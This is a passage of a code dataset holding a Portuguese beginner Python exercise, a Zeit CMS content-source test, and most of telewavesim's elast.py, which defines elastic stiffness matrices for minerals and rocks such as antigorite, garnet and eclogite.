] | null | null | null | exercisio 107.py | bruno194/EXERCICIOS | cf7f00020515731031275a9b8d2696d7bf3bb5dc | [
"MIT"
] | null | null | null | import funções_exercisios
preco = int(input('digte o preço R$ '))
a = funções_exercisios.metade(preco)
b = funções_exercisios.dobrar(preco)
c = funções_exercisios.porcentagem(preco)
print('a metade de {} é {}'.format(preco, a))
print('o dobro de {} é {}'.format(preco, b))
print('aumentamdo 10% temos {}'.format(c))
| 35.222222 | 45 | 0.712934 | 47 | 317 | 4.723404 | 0.510638 | 0.306306 | 0.081081 | 0.126126 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007143 | 0.116719 | 317 | 8 | 46 | 39.625 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0.246057 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.375 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6ffce6af3b731f74233cc99d43d01f80856df590 | 586 | py | Python | src/zeit/content/cp/tests/test_source.py | ZeitOnline/zeit.content.cp | ee1dbc34e385e47a5c52eabbe01cdae2df09bd76 | [
"BSD-3-Clause"
] | null | null | null | src/zeit/content/cp/tests/test_source.py | ZeitOnline/zeit.content.cp | ee1dbc34e385e47a5c52eabbe01cdae2df09bd76 | [
"BSD-3-Clause"
] | 11 | 2015-04-16T14:15:08.000Z | 2019-02-01T13:23:17.000Z | src/zeit/content/cp/tests/test_source.py | ZeitOnline/zeit.content.cp | ee1dbc34e385e47a5c52eabbe01cdae2df09bd76 | [
"BSD-3-Clause"
] | 1 | 2015-12-03T14:58:26.000Z | 2015-12-03T14:58:26.000Z | from zeit.cms.testing import copy_inherited_functions
import zeit.cms.content.tests.test_contentsource
import zeit.cms.testing
import zeit.content.cp.source
import zeit.content.cp.testing
class CPSourceTest(
zeit.cms.content.tests.test_contentsource.ContentSourceBase,
zeit.cms.testing.FunctionalTestCase):
layer = zeit.content.cp.testing.ZCML_LAYER
source = zeit.content.cp.source.centerPageSource
expected_types = ['centerpage-2009']
copy_inherited_functions(
zeit.cms.content.tests.test_contentsource.ContentSourceBase,
locals())
| 29.3 | 68 | 0.773038 | 70 | 586 | 6.342857 | 0.371429 | 0.094595 | 0.117117 | 0.128378 | 0.31982 | 0.31982 | 0.238739 | 0 | 0 | 0 | 0 | 0.007921 | 0.138225 | 586 | 19 | 69 | 30.842105 | 0.871287 | 0 | 0 | 0.142857 | 0 | 0 | 0.025597 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.357143 | 0 | 0.642857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
b5102559cc83a691b8835a58b7084de7ce5ad873 | 51,381 | py | Python | telewavesim/elast.py | mtoqeerpk/Telewavesim | 802ddc6342c6c0821619847653320ded5b325973 | [
"MIT"
] | null | null | null | telewavesim/elast.py | mtoqeerpk/Telewavesim | 802ddc6342c6c0821619847653320ded5b325973 | [
"MIT"
] | null | null | null | telewavesim/elast.py | mtoqeerpk/Telewavesim | 802ddc6342c6c0821619847653320ded5b325973 | [
"MIT"
] | 1 | 2021-07-18T15:47:03.000Z | 2021-07-18T15:47:03.000Z | # Copyright 2019 Pascal Audet
# This file is part of Telewavesim.
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
'''
Functions to define elastic stiffness matrices.
'''
import numpy as np
def iso_tensor(a, b):
"""
Elastic constants (GPa /density) of isotropic material in Voigt notation
Args:
a (float): P-wave velocity (km/s)
b (float): S-wave velocity (km/s)
Returns:
(np.ndarray): C: Elastic stiffness matrix (shape ``(6, 6)``)
Example
-------
>>> from telewavesim import elast
>>> elast.iso_tensor(6.e3, 3.6e3)
array([[36000000., 10080000., 10080000., 0., 0., 0.],
[10080000., 36000000., 10080000., 0., 0., 0.],
[10080000., 10080000., 36000000., 0., 0., 0.],
[ 0., 0., 0., 12960000., 0., 0.],
[ 0., 0., 0., 0., 12960000., 0.],
[ 0., 0., 0., 0., 0., 12960000.]])
"""
# Velocity to Lame parameters
mu = b*b
lam = a*a - 2.*mu
# Components of Voigt matrix
Cii = 2.*mu + lam
Cij = lam
Cjj = mu
C = np.zeros((6,6), dtype=float)
C[0,0] = Cii; C[0,1] = Cij; C[0,2] = Cij; C[0,3] = 0.; C[0,4] = 0.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = Cii; C[1,2] = Cij; C[1,3] = 0.; C[1,4] = 0.; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = Cii; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = Cjj; C[3,4] = 0.; C[3,5] = 0.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = Cjj; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = Cjj
return C
def tri_tensor(AA,CC,FF,LL,NN):
"""
Elastic constants (GPa /density) of transversely isotropic material in Voigt notation \
(hexagonal symmetry). See Porter et al. (2011) for details.
Args:
AA (float): elastic modulus (GPa /density)
CC (float): elastic modulus (GPa /density)
FF (float): elastic modulus (GPa /density)
LL (float): elastic modulus (GPa /density)
NN (float): elastic modulus (GPa /density)
Returns:
(np.ndarray): a: Elastic tensor (shape ``(3, 3, 3, 3)``)
Note:
Using ``tri_tensor`` does not make sense on its own.
Use it with ``telewavesim.utils.set_tri_tensor``
"""
a = np.zeros((3,3,3,3))
a[0,0,0,0] = AA
a[1,1,1,1] = AA
a[2,2,2,2] = CC
a[0,0,1,1] = (AA - 2.*NN)
a[1,1,0,0] = (AA - 2.*NN)
a[0,0,2,2] = FF
a[2,2,0,0] = FF
a[1,1,2,2] = FF
a[2,2,1,1] = FF
a[1,2,1,2] = LL
a[2,1,2,1] = LL
a[2,1,1,2] = LL
a[1,2,2,1] = LL
a[2,0,2,0] = LL
a[0,2,0,2] = LL
a[2,0,0,2] = LL
a[0,2,2,0] = LL
a[0,1,0,1] = NN
a[1,0,1,0] = NN
a[0,1,1,0] = NN
a[1,0,0,1] = NN
return a
def antigorite():
"""
Elastic constants of antigorite mineral (GPa) from
Bezacier, EPSL, 2010, in Voigt notation.
- Abbreviation: ``'atg'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2620 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.antigorite()[0]
array([[208.4, 66.2, 15.9, 0. , 2.4, 0. ],
[ 66.2, 201.6, 5. , 0. , -4.4, 0. ],
[ 15.9, 5. , 96.7, 0. , 2.5, 0. ],
[ 0. , 0. , 0. , 17.4, 0. , -13.1],
[ 2.4, -4.4, 2.5, 0. , 18.3, 0. ],
[ 0. , 0. , 0. , -13.1, 0. , 65. ]])
>>> elast.antigorite()[1]
2620.0
"""
rho = 2620.
C = np.zeros((6,6), dtype=float)
C[0,0] = 208.4; C[0,1] = 66.2; C[0,2] = 15.9; C[0,3] = 0.; C[0,4] = 2.4; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 201.6; C[1,2] = 5.; C[1,3] = 0.; C[1,4] = -4.4; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 96.7; C[2,3] = 0.; C[2,4] = 2.5; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 17.4; C[3,4] = 0.; C[3,5] = -13.1
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 18.3; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 65.
return C, rho
def biotite():
"""
Elastic constants of biotite mineral (GPa) from
Aleksandrov and Ryzhova (1986), in Voigt notation
- Abbreviation: ``'bt'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2800 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.biotite()[0]
array([[186. , 32.4, 11.6, 0. , 0. , 0. ],
[ 32.4, 186. , 11.6, 0. , 0. , 0. ],
[ 11.6, 11.6, 54. , 0. , 0. , 0. ],
[ 0. , 0. , 0. , 5.8, 0. , 0. ],
[ 0. , 0. , 0. , 0. , 5.8, 0. ],
[ 0. , 0. , 0. , 0. , 0. , 76.8]])
>>> elast.biotite()[1]
2800.0
"""
rho = 2800.
C = np.zeros((6,6), dtype=float)
C[0,0] = 186.; C[0,1] = 32.4; C[0,2] = 11.6; C[0,3] = 0.; C[0,4] = 0.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 186.; C[1,2] = 11.6; C[1,3] = 0.; C[1,4] = 0.; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 54.; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 5.8; C[3,4] = 0.; C[3,5] = 0.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 5.8; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 76.8
return C, rho
def blueschist_felsic():
"""
Elastic constants of Felsic Blueschist (GPa) from
Cao et al. (2013), in Voigt notation
- Abbreviation: ``'BS_f'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2970 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.blueschist_felsic()[0]
array([[ 1.4985e+02, 3.8700e+01, 3.2590e+01, -1.5000e-01, -1.0000e+00,
-1.9000e-01],
[ 3.8700e+01, 1.6355e+02, 3.0030e+01, 1.0500e+00, -1.8100e+00,
-1.7800e+00],
[ 3.2590e+01, 3.0030e+01, 1.2162e+02, 2.2000e-01, -9.5000e-01,
-1.3000e-01],
[-1.5000e-01, 1.0500e+00, 2.2000e-01, 4.8030e+01, -6.3000e-01,
-1.1400e+00],
[-1.0000e+00, -1.8100e+00, -9.5000e-01, -6.3000e-01, 4.8620e+01,
-1.0000e-02],
[-1.9000e-01, -1.7800e+00, -1.3000e-01, -1.1400e+00, -1.0000e-02,
5.8420e+01]])
>>> elast.blueschist_felsic()[1]
2970.0
"""
rho = 2970.
C = np.zeros((6,6), dtype=float)
C[0,0] = 149.85; C[0,1] = 38.7; C[0,2] = 32.59; C[0,3] = -0.15; C[0,4] = -1.; C[0,5] = -0.19
C[1,0] = C[0,1]; C[1,1] = 163.55; C[1,2] = 30.03; C[1,3] = 1.05; C[1,4] = -1.81; C[1,5] = -1.78
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 121.62; C[2,3] = 0.22; C[2,4] = -0.95; C[2,5] = -0.13
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 48.03; C[3,4] = -0.63; C[3,5] = -1.14
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 48.62; C[4,5] = -0.01
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 58.42
return C, rho
def blueschist_mafic():
"""
Elastic constants of Mafic Blueschist (GPa) from
Cao et al. (2013), in Voigt notation
- Abbreviation: ``'BS_m'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3190 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.blueschist_mafic()[0]
array([[ 1.9079e+02, 6.2280e+01, 5.2940e+01, -4.4000e-01, 4.6800e+00,
6.0000e-01],
[ 6.2280e+01, 2.1838e+02, 5.3100e+01, -8.7000e-01, 1.5700e+00,
2.8000e-01],
[ 5.2940e+01, 5.3100e+01, 1.5804e+02, -4.4000e-01, 2.6600e+00,
-3.5000e-01],
[-4.4000e-01, -8.7000e-01, -4.4000e-01, 6.0860e+01, -2.9000e-01,
1.8600e+00],
[ 4.6800e+00, 1.5700e+00, 2.6600e+00, -2.9000e-01, 5.8940e+01,
-2.0000e-01],
[ 6.0000e-01, 2.8000e-01, -3.5000e-01, 1.8600e+00, -2.0000e-01,
6.9630e+01]])
>>> elast.blueschist_mafic()[1]
3190.0
"""
rho = 3190.
C = np.zeros((6,6), dtype=float)
C[0,0] = 190.79; C[0,1] = 62.28; C[0,2] = 52.94; C[0,3] = -0.44; C[0,4] = 4.68; C[0,5] = 0.6
C[1,0] = C[0,1]; C[1,1] = 218.38; C[1,2] = 53.1; C[1,3] = -0.87; C[1,4] = 1.57; C[1,5] = 0.28
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 158.04; C[2,3] = -0.44; C[2,4] = 2.66; C[2,5] = -0.35
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 60.86; C[3,4] = -0.29; C[3,5] = 1.86
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 58.94; C[4,5] = -0.2
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 69.63
return C, rho
def clinopyroxene_92():
"""
Elastic constants of clinopyroxene mineral (GPa) from
Baghat et al. (1992), in Voigt notation
- Abbreviation: ``'cpx'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3327 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.clinopyroxene_92()[0]
array([[257.3, 85.9, 76.2, 0. , 7.1, 0. ],
[ 85.9, 216.2, 71.8, 0. , 13.3, 0. ],
[ 76.2, 71.8, 260.2, 0. , 33.7, 0. ],
[ 0. , 0. , 0. , 80.2, 0. , 10.2],
[ 7.1, 13.3, 33.7, 0. , 70.6, 0. ],
[ 0. , 0. , 0. , 10.2, 0. , 85.8]])
>>> elast.clinopyroxene_92()[1]
3327.0
"""
rho = 3327.
C = np.zeros((6,6), dtype=float)
C[0,0] = 257.3; C[0,1] = 85.9; C[0,2] = 76.2; C[0,3] = 0.; C[0,4] = 7.1; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 216.2; C[1,2] = 71.8; C[1,3] = 0.; C[1,4] = 13.3; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 260.2; C[2,3] = 0.; C[2,4] = 33.7; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 80.2; C[3,4] = 0.; C[3,5] = 10.2
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 70.6; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 85.8
return C, rho
def clinopyroxene_98():
"""
Elastic constants of clinopyroxene mineral (GPa) from
Collins and Brown (1998), in Voigt notation
- Abbreviation: ``None``: not currently used
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3190 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.clinopyroxene_98()[0]
array([[237.8, 83.5, 80. , 0. , 9. , 0. ],
[ 83.5, 183.6, 59.9, 0. , 9.5, 0. ],
[ 80. , 59.9, 229.5, 0. , 48.1, 0. ],
[ 0. , 0. , 0. , 76.5, 0. , 8.4],
[ 9. , 9.5, 48.1, 0. , 73. , 0. ],
[ 0. , 0. , 0. , 8.4, 0. , 81.6]])
>>> elast.clinopyroxene_98()[1]
3190.0
"""
rho = 3190.
C = np.zeros((6,6), dtype=float)
C[0,0] = 237.8; C[0,1] = 83.5; C[0,2] = 80.; C[0,3] = 0.; C[0,4] = 9.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 183.6; C[1,2] = 59.9; C[1,3] = 0.; C[1,4] = 9.5; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 229.5; C[2,3] = 0.; C[2,4] = 48.1; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 76.5; C[3,4] = 0.; C[3,5] = 8.4
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 73.; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 81.6
return C, rho
def dolomite():
"""
Elastic constants of dolomite mineral (GPa) from
Humbert and Plicque (1972), in Voigt notation
- Abbreviation: ``'dol'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2840 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.dolomite()[0]
array([[205. , 71. , 57.4, -19.5, 13.7, 0. ],
[ 71. , 205. , 57.4, 19.5, -13.7, 0. ],
[ 57.4, 57.4, 113. , 0. , 0. , 0. ],
[-19.5, 19.5, 0. , 39.8, 0. , -13.7],
[ 13.7, -13.7, 0. , 0. , 39.8, -19.5],
[ 0. , 0. , 0. , -13.7, -19.5, 67. ]])
>>> elast.dolomite()[1]
2840.0
"""
rho = 2840.
C = np.zeros((6,6), dtype=float)
C[0,0] = 205.; C[0,1] = 71.; C[0,2] = 57.4; C[0,3] = -19.5; C[0,4] = 13.7; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 205.; C[1,2] = 57.4; C[1,3] = 19.5; C[1,4] = -13.7; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 113.; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 39.8; C[3,4] = 0.; C[3,5] = -13.7
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 39.8; C[4,5] = -19.5
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 67.
return C, rho
def eclogite_foliated():
"""
Elastic constants of Foliated Eclogite rock (GPa) from
Cao et al. (2013), in Voigt notation
- Abbreviation: ``'EC_f'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3300 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.eclogite_foliated()[0]
array([[ 2.0345e+02, 6.7760e+01, 6.4470e+01, 8.0000e-02, 1.9000e+00,
-4.0000e-01],
[ 6.7760e+01, 2.2058e+02, 6.3650e+01, 4.6000e-01, 5.9000e-01,
6.0000e-02],
[ 6.4470e+01, 6.3650e+01, 1.8975e+02, 1.3000e-01, 9.5000e-01,
-2.0000e-01],
[ 8.0000e-02, 4.6000e-01, 1.3000e-01, 6.6320e+01, -2.7000e-01,
7.3000e-01],
[ 1.9000e+00, 5.9000e-01, 9.5000e-01, -2.7000e-01, 6.5770e+01,
-2.0000e-02],
[-4.0000e-01, 6.0000e-02, -2.0000e-01, 7.3000e-01, -2.0000e-02,
7.0750e+01]])
>>> elast.eclogite_foliated()[1]
3300.0
"""
rho = 3300.
C = np.zeros((6,6), dtype=float)
C[0,0] = 203.45; C[0,1] = 67.76; C[0,2] = 64.47; C[0,3] = 0.08; C[0,4] = 1.9; C[0,5] = -0.4
C[1,0] = C[0,1]; C[1,1] = 220.58; C[1,2] = 63.65; C[1,3] = 0.46; C[1,4] = 0.59; C[1,5] = 0.06
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 189.75; C[2,3] = 0.13; C[2,4] = 0.95; C[2,5] = -0.2
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 66.32; C[3,4] = -0.27; C[3,5] = 0.73
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 65.77; C[4,5] = -0.02
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 70.75
return C, rho
def eclogite_massive():
"""
Elastic constants of Massive Eclogite rock (GPa) from
Cao et al. (2013), in Voigt notation
- Abbreviation: ``'EC_m'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3490 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.eclogite_massive()[0]
array([[ 2.3885e+02, 8.2010e+01, 8.1440e+01, 3.0000e-01, -2.0000e-02,
5.0000e-01],
[ 8.2010e+01, 2.4212e+02, 8.1110e+01, -6.6000e-01, 3.3000e-01,
1.2000e-01],
[ 8.1440e+01, 8.1110e+01, 2.3557e+02, -2.8000e-01, 2.2000e-01,
3.1000e-01],
[ 3.0000e-01, -6.6000e-01, -2.8000e-01, 7.8720e+01, 2.7000e-01,
0.0000e+00],
[-2.0000e-02, 3.3000e-01, 2.2000e-01, 2.7000e-01, 7.8370e+01,
2.5000e-01],
[ 5.0000e-01, 1.2000e-01, 3.1000e-01, 0.0000e+00, 2.5000e-01,
7.7910e+01]])
>>> elast.eclogite_massive()[1]
3490.0
"""
rho = 3490.
C = np.zeros((6,6), dtype=float)
C[0,0] = 238.85; C[0,1] = 82.01; C[0,2] = 81.44; C[0,3] = 0.3; C[0,4] = -0.02; C[0,5] = 0.5
C[1,0] = C[0,1]; C[1,1] = 242.12; C[1,2] = 81.11; C[1,3] = -0.66; C[1,4] = 0.33; C[1,5] = 0.12
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 235.57; C[2,3] = -0.28; C[2,4] = 0.22; C[2,5] = 0.31
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 78.72; C[3,4] = 0.27; C[3,5] = 0.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 78.37; C[4,5] = 0.25
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 77.91
return C, rho
def epidote():
"""
Elastic constants of epidote mineral (GPa) from
Aleksandrakov et al. (1974), in Voigt notation
- Abbreviation: ``'ep'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3465 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.epidote()[0]
array([[211.5, 65.6, 43.2, 0. , -6.5, 0. ],
[ 65.6, 239. , 43.6, 0. , -10.4, 0. ],
[ 43.2, 43.6, 202.1, 0. , -20. , 0. ],
[ 0. , 0. , 0. , 39.1, 0. , -2.3],
[ -6.5, -10.4, -20. , 0. , 43.4, 0. ],
[ 0. , 0. , 0. , -2.3, 0. , 79.5]])
>>> elast.epidote()[1]
3465.0
"""
rho = 3465.
C = np.zeros((6,6), dtype=float)
C[0,0] = 211.5; C[0,1] = 65.6; C[0,2] = 43.2; C[0,3] = 0.; C[0,4] = -6.5; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 239.; C[1,2] = 43.6; C[1,3] = 0.; C[1,4] = -10.4; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 202.1; C[2,3] = 0.; C[2,4] = -20.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 39.1; C[3,4] = 0.; C[3,5] = -2.3
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 43.4; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 79.5
return C, rho
def garnet():
"""
Elastic constants of garnet mineral (GPa) from
Babuska et al. (1978), in Voigt notation
- Abbreviation: ``'grt'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3660 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.garnet()[0]
array([[306.2, 112.5, 112.5, 0. , 0. , 0. ],
[112.5, 306.2, 112.5, 0. , 0. , 0. ],
[112.5, 112.5, 306.2, 0. , 0. , 0. ],
[ 0. , 0. , 0. , 92.7, 0. , 0. ],
[ 0. , 0. , 0. , 0. , 92.7, 0. ],
[ 0. , 0. , 0. , 0. , 0. , 92.7]])
>>> elast.garnet()[1]
3660.0
"""
rho = 3660.
C = np.zeros((6,6), dtype=float)
C[0,0] = 306.2; C[0,1] = 112.5; C[0,2] = 112.5; C[0,3] = 0.; C[0,4] = 0.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 306.2; C[1,2] = 112.5; C[1,3] = 0.; C[1,4] = 0.; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 306.2; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 92.7; C[3,4] = 0.; C[3,5] = 0.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 92.7; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 92.7
return C, rho
def glaucophane():
"""
Elastic constants of glaucophane mineral (GPa) from
Bezacier et al. (2010), in Voigt notation
- Abbreviation: ``'gln'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3070 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.glaucophane()[0]
array([[122.3 , 45.7 , 37.2 , 0. , 2.3 , 0. ],
[ 45.7 , 231.5 , 74.9 , 0. , -4.8 , 0. ],
[ 37.2 , 74.9 , 254.6 , 0. , -2.37, 0. ],
[ 0. , 0. , 0. , 79.6 , 0. , 8.9 ],
[ 2.3 , -4.8 , -2.37, 0. , 52.8 , 0. ],
[ 0. , 0. , 0. , 8.9 , 0. , 51.2 ]])
>>> elast.glaucophane()[1]
3070.0
"""
rho = 3070.
C = np.zeros((6,6), dtype=float)
C[0,0] = 122.3; C[0,1] = 45.7; C[0,2] = 37.2; C[0,3] = 0.; C[0,4] = 2.3; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 231.5; C[1,2] = 74.9; C[1,3] = 0.; C[1,4] = -4.8; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 254.6; C[2,3] = 0.; C[2,4] = -2.37; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 79.6; C[3,4] = 0.; C[3,5] = 8.9
